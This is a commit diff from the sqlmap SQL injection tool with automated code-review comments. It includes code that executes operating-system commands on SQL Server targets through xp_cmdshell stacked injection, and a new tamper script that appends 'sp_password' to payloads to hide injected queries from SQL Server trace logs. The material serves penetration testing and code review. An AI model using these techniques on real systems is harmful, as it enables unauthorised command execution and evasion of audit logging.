
Commit 982fcde

committed
Fix for Issue #62
1 parent bc5025b commit 982fcde

3 files changed

Lines changed: 46 additions & 18 deletions


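--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -69,6 +69,14 @@ def _checkcache(self, index):
 with open(self.chunks[index], "rb") as fp:
 self.cache = Cache(index, pickle.load(fp), False)
 
+def __getslice__(self, i, j):
+retval = BigArray()
+i = max(0, len(self) + i if i < 0 else i)
+j = min(len(self), len(self) + j if j < 0 else j)
+for _ in xrange(i, j):
+retval.append(self[_])
+return retval
+
 def __getitem__(self, y):
 index = y / BIGARRAY_CHUNK_LENGTH
 offset = y % BIGARRAY_CHUNK_LENGTH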
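Review bot: The negative-index handling in the new `__getslice__` can adjust a bound twice. Python 2 already adds `len(self)` to a negative slice bound before calling `__getslice__` on an object that defines `__len__`, so a bound that arrives still negative means the request ran past the start of the sequence. Adding the length again turns `a[-7:]` on a five-element array into `a[3:]` instead of the whole array, and `a[:-7]` into `a[:3]` instead of an empty result. Clamping alone should be enough: `i = max(0, i)` and `j = max(0, min(len(self), j))`. A one-line docstring saying that the method copies the selected elements one by one into a new `BigArray` would also help the next reader.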

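--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -9,6 +9,7 @@
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import hashDBWrite
+from lib.core.common import isListLike
 from lib.core.common import isNoneValue
 from lib.core.common import pushValue
 from lib.core.common import popValue
@@ -154,8 +155,6 @@ def xpCmdshellExecCmd(self, cmd, silent=False):
 return inject.goStacked(cmd, silent)
 
 def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
-self.getRemoteTempPath()
-
 if conf.direct:
 output = self.xpCmdshellExecCmd(cmd)
 
@@ -170,23 +169,11 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
 
 output = new_output
 else:
-tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
-cmd = "%s > \"%s\"" % (cmd, tmpFile)
-
-self.xpCmdshellExecCmd(cmd)
-
-inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
-
-self.delRemoteFile(tmpFile)
-
-output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
+inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd))
+output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False)
 inject.goStacked("DELETE FROM %s" % self.cmdTblName)
-
-if output and isinstance(output, (list, tuple)):
-output = output[0]
-
-if output and isinstance(output, (list, tuple)):
-output = output[0]
+if output and isListLike(output):
+output = output[1:]
 
 return output
 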
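Review bot: `xpCmdshellEvalCmd` still accepts `first` and `last`, but the rewritten `else` branch in the last hunk no longer uses them. The removed `inject.getValue(...)` call passed `firstChar=first, lastChar=last, safeCharEncode=False`, while the new one passes only `resumeValue=False`, so a caller that asks for a character range now silently gets the full output on this path. Either forward the arguments again by adding `firstChar=first, lastChar=last` to the new call, or drop the parameters and record that in a docstring. The new `output = output[1:]` also discards the first row where the old code kept `output[0]`, and it needs a comment explaining why that row is not part of the result. Part of the function body lies between the second and third hunks and is not shown.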

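--- a/tamper/sp_password.py
+++ b/tamper/sp_password.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGH
+
+def tamper(payload):
+"""
+Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
+
+Example:
+* Input: 1 AND 9227=9227--
+* Output: 1 AND 9227=9227--sp_password
+
+Requirement:
+* MSSQL
+
+Notes:
+* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
+* Reference: http://websec.ca/kb/sql_injection
+"""
+
+retVal = ""
+
+if payload:
+retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
+
+return retVal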
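Review bot: The docstring example does not match what `tamper` returns. The check looks for `'#'` or `"-- "` (with a trailing space), so the documented input `1 AND 9227=9227--` contains neither and the function inserts `-- ` before `sp_password`; the example should use `1 AND 9227=9227-- ` as input and `1 AND 9227=9227-- sp_password` as output. The condition itself reads more plainly as `any(_ in payload for _ in ('#', "-- "))`. The note about "T-SQL logs" would be more accurate if it said the masking applies to SQL Server trace text only: web-server and proxy logs still record the request, and the masked trace event remains visible to anyone reviewing the trace.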
